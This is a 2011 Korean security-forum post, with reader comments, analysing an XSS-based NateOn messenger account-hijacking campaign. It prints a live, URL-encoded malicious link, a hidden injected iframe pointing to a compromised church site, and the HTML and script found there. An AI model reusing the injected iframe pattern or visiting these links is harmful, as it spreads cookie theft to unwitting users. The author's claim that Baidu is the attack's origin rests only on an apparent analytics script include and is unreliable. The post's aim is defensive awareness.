1596,

1/80

푸른하늘

http://www.cyworld.com/hsbluesky

신형 중국발 네이트온 해킹 분석

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1659 [복사]

안녕하세요.

네이트온을 하는 한 유저로써 !!! - _-
한번 신형 해킹기법을 분석해 보았습니다.

다들 아시다시피 한명이 뿌리게 되면 그 쪽지의 링크를 열어보게되고 100명중 30명은 초기에 당합니다. 70명은 대중의 소문으로 인지하고있구요. 30명은 잘 모르는 분들.

30명의 계정은 또 로그인이 되어 추가된 유저들에게 뿌리게 되고...
삽시간에 쪽지는 돌고 돌고 또 돕니다. 올레 ~

자 이제 실전입니다.

해당 링크에 네이트온 로그인 하시고 클릭하지마십시오.
- 실제 해킹 url -

http://www.ka%6Dc.co.kr/nzeo/view.php?id=news&no=132

Do not click !!!

자 이제 링크의 특성을 살펴 봅시다.

co.kr 국내 url 링크입니다.
ka%6dc  url encoding 으로 링크를 변조하였습니다.
%6D = m

본래 url - http://www.kamc.co.kr/nzeo/view.php?id=news&no=132 - Do not click !!!

http://www.kamc.co.kr/  국내 사이트가 되는군요.
현재 해당 사이트에 전화를 하여 해당 게시글 삭제 요청을 하엿습니다.

- 신형 기법 -

국내의 취약한 웹사이트에 script 게시글을 올리게 됩니다.
해당 악성 스크립트 게시글은 XSS기법의 스크립트입니다.

네이트온 로그인 상태로 해당 쪽지를 받아 해당 링크로 가게 되면 쿠키값들이 악의적인 서버로 전송 되게 됩니다.
여기서 대부분 2~3번 이상을 전송하게 됩니다만. 혹여 실패가 일어나거나 변조 된다하더라도 10개중 2개의 값이 이상하고 8번이 같다. 그럼 당연 확률적으로 8번이 맞는 말이 됩니다. 따라서 여러번 전송하도록 되어있습니다.

해당 사이트 링크에 접속하면 해당 사이트에 모두 존재하지 않는 악의적 플래쉬 파일을 자동으로 내리 받습니다. 또한 다른 방식으로는 현재 신형기법에서는 그렇지 않지만 Active X 를 요구한다거나 여러 요청들을 보내어 백도어를 심어 좀비 pc 로 만들어버립니다.

우리가 가장 주의해야 할건 더이상 퍼지지 않도록 이런 쪽지들이 오면 절대로 열어봐선 안된다는 것 입니다.
공격당한 링크의 웹사이트 스크립트는 이미 감염되여 열어볼 시 네이트온 로그인 상태의 쿠키값이 넘어가게 됩니다.

그리고 국내 웹사이트 운영하시는 분들이 알아야 할 사실 하나.

국외의 공격이라 잡기가 힘든건 사실상 ...
왜 국내 사이트로 굳이 하는 걸 까요 ?

국외에서 프록시를 몇 번 돌려서 국내 사이트에 다시한번 우회해서 접근하여 사이트 하나에 글을 올립니다.
그리고는 타겟들이 들어오게 된다면 공격은 국내 사이트 내에서 이루워진다고 보시면 됩니다.

한마디로 꿩대신 닭이라는 말입니다.

- 실전 소스 분석 -

저 위의 사이트에 삽입된 소스에서 추출해낸 다른 소스입니다.

iframe 를 이용한 태그입니다.

두번째 타겟이 된 사이트입니다. 교회 사이트이며 역시나 국내사이트입니다.
여러곳을 거치게 만들어 역으로 잡는 것을 힘들게하며 잡을만 하면 다른 방법으로 또 빠져나가는 미꾸라지들입니다.

<iframe frameborder=0 src=http://www.imchurch.net/bbs/data/sub1_8/index.html width=100 height=1 scrolling=no></iframe>

저기에 보이는 해당 링크로 접속해 보았습니다.

<html><head>

<meta http-equiv="content-type" content="text/html; charset=euc-kr">
<title>로그인</title>
<link rel="stylesheet" href="../style.css" type="text/css">
</head><body topmargin="0" leftmargin="0">

<iframe src="main.html" frameborder="0" height="10" scrolling="no" width="100"></iframe>
<script type="text/javascript" src="in.js"></script>
<script type="text/javascript" src="http://www.npcn.or.kr/zero/data/index/ajax.js"></script><script src="%20http://hm.baidu.com/h.js?b41ce2a26206d693a01237d661513b7c" type="text/javascript"></script>

</body></html>

로그인의 페이지가 tittle 만 그렇습니다.

저 안에 또다른 링크가 또 뜹니다. 역시 접근을 해보았습니다.

var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fb41ce2a26206d693a01237d661513b7c' type='text/javascript'%3E%3C/script%3E"));

http://hm.baidu.com/h.js?b41ce2a26206d693a01237d661513b7c

http://baidu.com/

... 중국 사이트입니다.

결국 요즘 계속해서 들어오는 중국발 해킹의 근원지는 이곳입니다.

다른 공격도 마찬가지입니다. 소스 분석결과 해당 사이트가 나왔음을 명백하게 밝힙니다.

긴 글 읽어주셔서 감사합니다.

우리나라 또한 아이티 강국인만큼 아이티보안에 힘써야 합니다.

우리모두 분발하여 성공합시당.

화이팅 !!

Hit : 14406 Date : 2011/02/12 06:04


rkdgh0112	정말감사 ㄷㄷ.. 원리가 궁금했었는데	2011/02/12
starsol	감사합니다. 친구들한테서 이러한 쪽지 많이 왔는데,,, 암튼, 보안에 더욱 힘써야겠어요~	2011/02/13
xodnr631	엇.. 저도 친구 3명에게 동시에 이런 문자가 와서 제 티스토리에 작성대기 중 이였는데.. 어쨌든 좋은 내용이니 참고하고 가겠습니다~ ^^	2011/02/13
U_SoRang	cross-site scripting....이었군요....;;;;;	2011/02/13
white-hacker	잘봤습니다^^ 7~8월에 이어서 또다시 기승을 부리네요	2011/02/14
ganesha	화이팅!	2011/02/15
lsykoh2	화이팅 중국 크래커들 다 잡아버릴거야	2011/02/15
chachadl73	신종 XSS 이네요...좋은정보 감사합니다.	2011/02/16
내가해커	오오,,,, 저가몰랐던 중국 크래커들분석 감사합니다	2011/02/22
ijs1415	오..수고하셨습니다~ 감사해요!	2011/06/15
yswang17	우와....중국 싫어요 ㅠㅠ	2011/07/23
salis	감사합니다.	2011/08/19